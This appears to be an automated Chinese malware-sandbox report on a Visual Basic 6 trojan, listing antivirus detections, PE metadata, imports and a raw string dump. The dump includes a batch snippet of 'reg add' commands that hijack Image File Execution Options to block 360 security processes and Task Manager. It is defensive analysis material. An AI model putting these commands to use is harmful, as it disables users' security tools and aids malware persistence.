1.1
低危

1dba5fa6a11c8efbed8da417602459f8d6280746fd15e9d9d034065c6a407ab3

1dba5fa6a11c8efbed8da417602459f8d6280746fd15e9d9d034065c6a407ab3.exe

分析耗时

194s

最近分析

361天前

文件大小

643.1KB
静态报毒 动态报毒 CVE FAMILY METATYPE PLATFORM TYPE UNKNOWN WIN32 TROJAN FSYSNA
鹰眼引擎
DACN 0.12
FACILE 1.00
IMCLNet 0.68
MFGraph 0.00
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba virus:Win32/InfectPE.ali2000007 20190527 0.3.0.5
Avast Win32:TrojanX-gen [Trj] 20240216 23.9.8494.0
Baidu None 20190318 1.0.0.2
CrowdStrike win/malicious_confidence_100% (W) 20231026 1.0
Kingsoft malware.kb.a.1000 20230906 None
McAfee Trojan-FQXU!0A85902514FC 20240216 6.0.6.653
Tencent Trojan.Win32.Fsysna.a 20240216 1.0.0.1
静态指标
行为判定
动态指标
在 PE 资源中识别到外语 (1 个事件)
name RT_VERSION language LANG_CHINESE filetype None sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0000a9a4 size 0x0000024c
网络通信
与未执行 DNS 查询的主机进行通信 (2 个事件)
host 114.114.114.114
host 8.8.8.8
文件已被 VirusTotal 上 63 个反病毒引擎识别为恶意 (50 out of 63 个事件)
ALYac Trojan.Agent.DVQW
APEX Malicious
AVG Win32:TrojanX-gen [Trj]
AhnLab-V3 Trojan/Win32.Fsysna.R269415
Alibaba virus:Win32/InfectPE.ali2000007
Antiy-AVL Trojan/Win32.Fsysna.fccr
Arcabit Trojan.Agent.DVQW
Avast Win32:TrojanX-gen [Trj]
Avira TR/Dropper.Gen
BitDefender Trojan.Agent.DVQW
BitDefenderTheta AI:Packer.EF7EAB101F
Bkav W32.AIDetectMalware
CAT-QuickHeal Trojan.FsysnaVMF.S25436422
ClamAV Win.Malware.Fsysna-7004456-0
CrowdStrike win/malicious_confidence_100% (W)
Cybereason malicious.167d9b
Cylance unsafe
Cynet Malicious (score: 100)
DeepInstinct MALICIOUS
DrWeb Trojan.KillFiles.64121
ESET-NOD32 Win32/KillFiles.A
Emsisoft Trojan.Agent.DVQW (B)
F-Secure Trojan.TR/Dropper.Gen
FireEye Generic.mg.0a85902514fc9d8d
Fortinet W32/Fsysna.FCCR!tr
GData Win32.Trojan.Musecador.A
Google Detected
Gridinsoft Virus.Win32.Gen.ka!i
Ikarus Trojan.Agent
Jiangmin Trojan.Fsysna.kfk
K7AntiVirus Trojan ( 0000bbc81 )
K7GW Trojan ( 0000bbc81 )
Kaspersky Trojan.Win32.Fsysna.fcpq
Kingsoft malware.kb.a.1000
Lionic Trojan.Win32.Fsysna.tpPg
MAX malware (ai score=88)
Malwarebytes Generic.Malware.AI.DDS
MaxSecure Trojan.Fsysna.fcpq
McAfee Trojan-FQXU!0A85902514FC
MicroWorld-eScan Trojan.Agent.DVQW
Microsoft Trojan:Win32/Musecador
NANO-Antivirus Trojan.Win32.Fsysna.fpivmo
Panda Trj/Genetic.gen
Rising Worm.KillFile!1.B91B (CLASSIC)
SUPERAntiSpyware Trojan.Agent/Gen-Fsysna
Sangfor Suspicious.Win32.Save.vb
SentinelOne Static AI - Malicious PE
Skyhigh BehavesLike.Win32.Fujacks.jm
Sophos Troj/VB-KNV
Symantec Trojan Horse
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2019-04-20 18:22:04

PE Imphash

d2bf2bc66c5e49a85254cd29b19046bd

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00007df0 0x00008000 6.058616924670466
.data 0x00009000 0x00000b40 0x00001000 0.0
.rsrc 0x0000a000 0x00001000 0x00001000 4.416328167746471

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0000a0e8 0x000008a8 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_GROUP_ICON 0x0000a990 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL None
RT_VERSION 0x0000a9a4 0x0000024c LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED None

Imports

Library MSVBVM60.DLL:
0x401000 _CIcos
0x401004 _adj_fptan
0x401008 __vbaStrI4
0x40100c __vbaVarMove
0x401010 __vbaAryMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaLenBstr
0x401020 __vbaFreeVarList
0x401024 __vbaEnd
0x401028 _adj_fdiv_m64
0x40102c __vbaFreeObjList
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaError
0x40103c __vbaSetSystemError
0x401044 _adj_fdiv_m32
0x401048 __vbaAryDestruct
0x40104c __vbaExitProc
0x401050 __vbaVarForInit
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 __vbaOnError
0x401064 _adj_fdiv_m16i
0x401068 _adj_fdivr_m16i
0x40106c None
0x401070 _CIsin
0x401074 __vbaErase
0x401078 __vbaChkstk
0x40107c __vbaGosubFree
0x401080 __vbaFileClose
0x401084 EVENT_SINK_AddRef
0x40108c None
0x401090 __vbaAryConstruct2
0x401094 __vbaPutOwner4
0x401098 __vbaI2I4
0x40109c DllFunctionCall
0x4010a0 __vbaFpUI1
0x4010a4 __vbaRedimPreserve
0x4010a8 __vbaStrR4
0x4010ac _adj_fpatan
0x4010b4 None
0x4010b8 __vbaRedim
0x4010bc EVENT_SINK_Release
0x4010c0 __vbaNew
0x4010c4 None
0x4010c8 __vbaUI1I2
0x4010cc _CIsqrt
0x4010d4 __vbaUI1I4
0x4010d8 __vbaExceptHandler
0x4010dc __vbaPrintFile
0x4010e0 __vbaStrToUnicode
0x4010e4 None
0x4010e8 _adj_fprem
0x4010ec _adj_fdivr_m64
0x4010f0 __vbaGosub
0x4010f4 None
0x4010f8 __vbaFPException
0x4010fc None
0x401100 __vbaGetOwner3
0x401104 __vbaStrVarVal
0x401108 __vbaVarCat
0x40110c __vbaGetOwner4
0x401110 __vbaI2Var
0x401114 __vbaLsetFixstrFree
0x401118 None
0x40111c _CIlog
0x401120 __vbaErrorOverflow
0x401124 __vbaFileOpen
0x401128 __vbaVar2Vec
0x40112c __vbaNew2
0x401130 None
0x401134 None
0x401138 None
0x40113c _adj_fdiv_m32i
0x401140 _adj_fdivr_m32i
0x401144 None
0x401148 __vbaStrCopy
0x40114c __vbaVarSetObj
0x401150 __vbaFreeStrList
0x401154 __vbaDerefAry1
0x401158 _adj_fdivr_m32
0x40115c _adj_fdiv_r
0x401160 None
0x401164 None
0x401168 __vbaVarTstNe
0x40116c None
0x401170 __vbaI4Var
0x401174 __vbaVarAdd
0x401178 __vbaAryLock
0x40117c __vbaVarDup
0x401180 __vbaStrToAnsi
0x401188 __vbaFpI4
0x40118c __vbaVarCopy
0x401190 None
0x401198 _CIatan
0x40119c __vbaStrMove
0x4011a0 __vbaStrVarCopy
0x4011a4 _allmul
0x4011a8 __vbaLenVarB
0x4011ac _CItan
0x4011b0 __vbaAryUnlock
0x4011b4 __vbaFPInt
0x4011b8 __vbaVarForNext
0x4011bc _CIexp
0x4011c0 __vbaFreeStr
0x4011c4 __vbaFreeObj

L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
9879B1117C2F52F3F44D9A9A81AC476E
A9266167DF485E9B09A71C9F89C0D353
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlrr
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE|}P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
9879B1117C2F52F3F44D9A9A81AC476E
27CA0FCD2DAAE7A7EB747D3A145576A4
5248EB67C12453E6095825C3CA5AB511
EFA98277E63887E8D73701C276868D89
0EBF4B91B831E1C425F726148AE62E7C
0D3FA8E553D5B7E42230F708A5D4FE5A
2EE3A67B8F6B311C4DD1D485499D5E0F
A7348EB77690DE798787AA6307DA3605
73C442FD8006A7C4417B7738123891E4
61185570E75D2D7609C78E5468698018
B2E9DFE412DF6091909609CD0AA81C2F
09A63360C0EF11E8A24CF5AFFD14660F
27BAF0A25FB914D641CF5045F9C20C9C
3AB6330808D43501A7CAF40C68830149
DX8QPWTL
DX8QPWTL
DX8QPWTL
X8QPWT
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
